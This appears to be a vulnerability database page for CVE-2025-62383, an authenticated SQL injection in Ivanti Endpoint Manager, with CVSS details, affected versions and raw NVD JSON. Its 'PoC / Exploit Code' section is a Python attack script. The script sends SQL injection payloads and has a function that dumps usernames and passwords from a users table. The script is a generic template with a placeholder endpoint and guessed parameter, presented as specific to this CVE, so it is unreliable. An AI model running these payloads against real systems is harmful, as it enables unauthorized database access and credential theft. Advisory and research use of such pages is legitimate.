Security Vulnerability Report
中文
CVE-2025-62383 CVSS 6.5 MEDIUM

CVE-2025-62383

Published: 2025-10-13 22:15:34
Last Modified: 2026-02-10 18:16:21
Source: 3c1d8aa1-5a33-4ea4-8992-aadd6440af75

Description

SQL injection in Ivanti Endpoint Manager before version 2024 SU5 allows a remote authenticated attacker to read arbitrary data from the database.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager:2024:su1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager:2024:su2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager:2024:su3:*:*:*:*:*:* - VULNERABLE
Ivanti Endpoint Manager < 2024 SU5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62383 - Ivanti Endpoint Manager SQL Injection PoC # Vulnerability: SQL Injection in Ivanti Endpoint Manager before 2024 SU5 # Requirements: Valid low-privilege authenticated session import requests TARGET_URL = "https://target-ivanti-epm.com" SESSION_COOKIE = "auth_cookie_value" # Valid low-privilege session cookie VULNERABLE_ENDPOINT = "/api/v1/some_vulnerable_endpoint" # SQL Injection payloads to test payloads = [ "' OR '1'='1' --", "' UNION SELECT NULL, username, password FROM users --", "' UNION SELECT NULL, table_name, NULL FROM information_schema.tables --", "1' OR '1'='1", "'; WAITFOR DELAY '0:0:5' --" # Time-based blind SQLi test ] def exploit_sql_injection(target_url, endpoint, cookie, payload): """ Send SQL injection payload to the vulnerable endpoint """ headers = { "Cookie": f"session={cookie}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } # Inject payload into a parameter (e.g., id, search, filter) data = { "id": payload, # Other parameters as needed } try: response = requests.post( f"{target_url}{endpoint}", headers=headers, data=data, verify=False, timeout=30 ) return response except requests.exceptions.RequestException as e: print(f"Request failed: {e}") return None # Example usage for payload in payloads: print(f"\n[*] Testing payload: {payload}") response = exploit_sql_injection(TARGET_URL, VULNERABLE_ENDPOINT, SESSION_COOKIE, payload) if response and response.status_code == 200: print(f"[+] Response: {response.text[:500]}") # Check for successful injection indicators if "error" not in response.text.lower() or "data" in response.text.lower(): print("[+] Possible successful injection!") # Data extraction example using UNION-based SQLi def extract_data(target_url, endpoint, cookie, table_name): """Extract data from a specific table using UNION-based SQL injection""" payload = f"' UNION SELECT NULL, CONCAT(username, ':', password), NULL FROM {table_name} --" response = exploit_sql_injection(target_url, endpoint, cookie, payload) if response: print(f"\n[+] Extracted data from {table_name}: {response.text}") return response # Extract sensitive information extract_data(TARGET_URL, VULNERABLE_ENDPOINT, SESSION_COOKIE, "users")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62383", "sourceIdentifier": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "published": "2025-10-13T22:15:34.257", "lastModified": "2026-02-10T18:16:20.527", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection in Ivanti Endpoint Manager before version 2024 SU5 allows a remote authenticated attacker to read arbitrary data from the database."}], "metrics": {"cvssMetricV31": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "7ABDE6FE-56CC-4A46-91F2-2F54C3EC6A75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:*", "matchCriteriaId": "6C7283FE-C10A-4E37-B004-15FB0CAC49A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su1:*:*:*:*:*:*", "matchCriteriaId": "FC51EEA2-1C4C-4069-9704-7ACFE4773930"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su2:*:*:*:*:*:*", "matchCriteriaId": "E1EF5E1B-9377-49D3-9BE3-62FC78E666A3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3:*:*:*:*:*:*", "matchCriteriaId": "749AADDA-834D-4EC0-B7FF-E136FD1984F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3_security_release_1:*:*:*:*:*:*", "matchCriteriaId": "698BF7A1-62A1-45B5-BF08-AB3F3AA0245C"}]}]}], "references": [{"url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-EPM-October-2025", "source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "tags": ["Vendor Advisory"]}]}}